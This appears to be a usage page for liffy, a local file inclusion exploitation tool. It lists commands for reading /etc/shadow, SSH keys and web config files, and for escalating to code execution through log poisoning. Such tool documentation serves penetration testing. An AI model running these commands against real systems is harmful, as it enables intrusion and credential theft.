Description
liffy is a local file inclusion (LFI) exploitation tool that automates detecting and exploiting LFI vulnerabilities. It supports log poisoning, PHP filter chains, /proc/self/environ injection, and data:// wrapper techniques.
Installation
BASH
git clone https://github.com/mzfr/liffy.git
cd liffy
pip3 install -r requirements.txtBasic Usage
BASH
# Basic LFI test
python3 liffy.py -u "https://target.com/page.php?file=" --lfi
# Specify the sensitive file to read
python3 liffy.py -u "https://target.com/page.php?file=" --lfi -f /etc/passwdAdvanced Usage
BASH
# Log poisoning (LFI → RCE)
python3 liffy.py -u "https://target.com/page.php?file=" --lfi -l /var/log/apache2/access.log
# PHP filter (read source code)
python3 liffy.py -u "https://target.com/page.php?file=" --lfi --filter
# /proc/self/environ technique
python3 liffy.py -u "https://target.com/page.php?file=" --lfi --environ
# With cookies
python3 liffy.py -u "https://target.com/page.php?file=" --lfi -c "PHPSESSID=abc123"Common Workflows
BASH
# Step 1: Detect LFI
python3 liffy.py -u "https://target.com/page.php?file=" --lfi
# Step 2: Read sensitive files
# /etc/passwd, /etc/shadow, ~/.ssh/id_rsa, /proc/self/environ
# /var/www/html/config.php, wp-config.php
# Step 3: Escalate to RCE via log poisoning
# Poison access log with PHP code in User-Agent
# Then include the log file via LFI